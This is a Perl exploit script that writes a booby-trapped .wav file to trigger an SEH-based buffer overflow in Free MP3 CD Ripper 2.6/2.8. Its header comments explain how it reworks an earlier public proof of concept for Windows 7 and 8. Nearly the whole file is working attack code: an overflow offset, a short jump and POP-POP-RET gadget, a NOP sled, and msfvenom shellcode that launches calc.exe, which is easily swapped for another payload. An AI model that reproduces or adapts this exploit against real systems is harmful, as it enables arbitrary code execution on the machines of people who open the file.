Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow

#!/usr/bin/env perl

# original p0c https://www.exploit-db.com/exploits/36465/

# credit to TUNISIAN CYBER

# however he was attemping to vanilla buffer overflow

# in fact it is SEH based exploit

# using the address 0x7C9D30D7 is limit the targets

#which I assume belongs to OS file didn't work on win7

#yes he did find a buffer overflow since the offset reaches ESP before SEH

#in this app, SEH based exploits are more effective and the main vuln in this case should be SEH

#This p0c > win 7s & 8s

# ThreatActor at CoreRed.com

##

my $file = "p0c.wav";

my $buff = "A" x 4116; # offset to SEH

my $nseh = "\xeb\x06\xff\xff"; #dat 8 jmp

my $seh = pack('V', 0x66E42A79); # 66E42A79 5E POP ESI ogg.dll

my $nop = "\x90" x 28;

#msfvenom -p windows/exec CMD=calc.exe -f perl -b '\x00\xff\x0a\x0d'

my $shell =

"\xda\xcd\xd9\x74\x24\xf4\xb8\x50\x99\x22\x39\x5b\x33\xc9" .

"\xb1\x31\x31\x43\x18\x83\xc3\x04\x03\x43\x44\x7b\xd7\xc5" .

"\x8c\xf9\x18\x36\x4c\x9e\x91\xd3\x7d\x9e\xc6\x90\x2d\x2e" .

"\x8c\xf5\xc1\xc5\xc0\xed\x52\xab\xcc\x02\xd3\x06\x2b\x2c" .

"\xe4\x3b\x0f\x2f\x66\x46\x5c\x8f\x57\x89\x91\xce\x90\xf4" .

"\x58\x82\x49\x72\xce\x33\xfe\xce\xd3\xb8\x4c\xde\x53\x5c" .

"\x04\xe1\x72\xf3\x1f\xb8\x54\xf5\xcc\xb0\xdc\xed\x11\xfc" .

"\x97\x86\xe1\x8a\x29\x4f\x38\x72\x85\xae\xf5\x81\xd7\xf7" .

"\x31\x7a\xa2\x01\x42\x07\xb5\xd5\x39\xd3\x30\xce\x99\x90" .

"\xe3\x2a\x18\x74\x75\xb8\x16\x31\xf1\xe6\x3a\xc4\xd6\x9c" .

"\x46\x4d\xd9\x72\xcf\x15\xfe\x56\x94\xce\x9f\xcf\x70\xa0" .

"\xa0\x10\xdb\x1d\x05\x5a\xf1\x4a\x34\x01\x9f\x8d\xca\x3f" .

"\xed\x8e\xd4\x3f\x41\xe7\xe5\xb4\x0e\x70\xfa\x1e\x6b\x8e" .

"\xb0\x03\xdd\x07\x1d\xd6\x5c\x4a\x9e\x0c\xa2\x73\x1d\xa5" .

"\x5a\x80\x3d\xcc\x5f\xcc\xf9\x3c\x2d\x5d\x6c\x43\x82\x5e" .

"\xa5\x20\x45\xcd\x25\x89\xe0\x75\xcf\xd5";

open($FILE,">$file");

print $FILE $buff.$nseh.$seh.$nop.$shell;

close($FILE);

print "+++++++++++++++++++\n";